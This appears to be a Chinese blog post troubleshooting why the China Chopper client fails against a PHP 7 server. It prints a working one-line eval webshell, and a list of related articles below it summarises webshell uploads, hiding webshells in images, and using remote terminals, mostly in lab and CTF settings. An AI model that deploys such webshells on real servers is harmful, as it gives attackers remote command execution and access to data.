菜刀连接PHP WebShell返回200错误

最新推荐文章于 2023-03-01 13:49:35 发布
最新推荐文章于 2023-03-01 13:49:35 发布
阅读量1.9k 收藏 1
点赞数
文章标签: php 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41679427/article/details/110311911
版权
博客探讨了在使用菜刀连接PHP WebShell时遇到200错误的详细情况。错误源于PHP7版本中对某些函数动态调用的限制。解决方案是修改菜刀配置文件中的特定函数调用。
摘要由CSDN通过智能技术生成

错误详情

WebShell内容:

<?php
    @eval($_POST['cmd']);
?>
  • 1
  • 2
  • 3

错误详情:

image-20200617163443345

在Hackber或BurpSuite中却没有问题:

image-20200617163510202

原因分析

PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d

如果把一句话Shell中的@符号去掉,会提示:Cannot call assert() with string argument dynamically in ...shell.php(1) : eval()'d code on line 1

解决方案

在菜刀的配置文件中(caidao.conf)找到:array_map("ass"."ert

最低0.47元/天 解锁文章
CanMeng'Blog
关注
WebShell连接工具(中国菜刀WeBaCoo、Weevely)使用
悦分享
07-31 3463
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
Webshell上传方式
悦分享
07-31 3883
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
DVWA Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK问题)
qq_45780190的博客
05-10 3251
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马 上传成功后用中国菜刀连接 发生以下问题 解决问题: pjp版本过高 将php版本降低为php5.0即可
[极客大挑战 2019]Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK)
xlcvv的博客
04-06 6089
菜刀连接文件上传出现: HTTP/1.1 200 OK Server: openresty Date: Mon, 06 Apr 2020 08:42:03 GMT Content-Type: text/html Content-Length: 8 Connection: close X-Powered-By: PHP/5.5.9-1ubuntu4.29 的解决过程 关于文件上传的题目,之前一直有...
记一次菜刀报错
最新发布
forinput的博客
03-01 215
记一次菜刀报错
中国菜刀连接本地apache出现500错误的最快解决办法
weixin_43618066的博客
09-27 2552
中国菜刀连接本地apache出现500错误的最快解决办法 我几乎在百度,csdn查遍了所有方法,又复杂又不能成功。后来自己换了一下phpstudy的php版本,把php7换成5的版本就可以顺利解决了。 解决问题先用最简单的办法解决再尝试复杂的办法。但前提是你的代码,路径,网络是没问题的。 ...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 901
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 2942
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
动态调用函数时的命令执行对于eval()和assert()的执行问题
Alexhirchi的博客
07-02 3500
前言 在做一道通过反序列化后动态调用函数的题目时,最后获取flag使用assert和phpinfo() 构成的命令可以执行 但eval和phpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了一些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
Weevely(PHP菜刀)工具使用
血色苍穹
11-02 2726
前言 Weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(仅限于PHP),在linux上使用时还是很给力的,就是某些模块在Windows上无法使用,总的来说还是非常不错的一款工具。 仅用于安全学习教学之用,禁止非法用途 木马生成和命令格式 生成Weevely专用的木马 命令格式:weevely genera...
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6083
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8409
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误
逸鹏说道
08-25 147
前言 逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了 问题 如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示 解决 用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013...
php strtoup,PHP 7 的几处函数安全小变化
weixin_39997443的博客
03-09 262
To Begin With最近在准备 LANCTF,想把环境迁移到 PHP 7,却想到一些 payload 失效了。想着什么时候总结成一个笔记,恰巧在 FB 发现有人写了一篇博文,拜读后结合 CTF 环境整理了一下,总体来说,弃用了较多不安全的使用方式,但运行环境未过多限制时仍可使用。测试环境docker pull php:7.3.3-apachedocker pull php:7.0-apach...
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
文件上传一句话木马,用菜刀进行连接
XY011009的博客
12-02 9132
菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。 1.无任何上传限制 这里可以直接上传一句话木马然后用菜刀工具进行连接 2.限制了文件类型 有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看...
菜刀工具连接不上_win7连接打印机提示错误0x00000002的解决教程
weixin_39733943的博客
11-18 421
今天小编给大家分享的是win7连接打印机提示错误0x00000002的解决教程,打印机是很多用户日常办公必备的工具,在很多地方,打印机都是以网络的形式进行连接的,当你使用打印机时,遇到无法连接错误0x00000002的问题时,可参照以下的方法进行解决。最近有win7系统用户使用打印机的时候,发现打印机出现了问题,导致无法打印,那么win7电脑无法连接打印机提示错误0x00000002如何解决呢?就...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值